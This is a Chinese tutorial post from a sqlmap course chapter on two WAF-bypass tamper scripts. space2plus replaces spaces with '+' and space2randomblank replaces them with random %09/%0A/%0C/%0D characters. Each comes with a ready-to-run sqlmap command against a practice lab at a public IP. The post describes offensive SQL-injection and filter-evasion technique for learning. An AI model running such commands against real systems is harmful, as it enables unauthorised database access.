sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

标签：and   http   添加   绕过   python   loading   batch   space   精通   

46. space2plus.py脚本

通过使用"+"来替换空格 适用于所有数据库

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2plus.py" --proxy="http://127.0.0.1:8080" -batch

没有注入成功，我们看看burp抓包情况

确认效果是没问题的，使用+衔接

==================================================================================================================================================

47. space2randomblank.py脚本

使用类似%09,%0A,%0C,%0D随机字符串替换payload中的空格

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2randomblank.py" --proxy="http://127.0.0.1:8080" -batch

确认是可以成功注入，那么我们看看burp的抓包情况

确实添加了%0A %0C等随机字符串进行注入

sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

标签：and   http   添加   绕过   python   loading   batch   space   精通   

原文地址：https://www.cnblogs.com/autopwn/p/13617833.html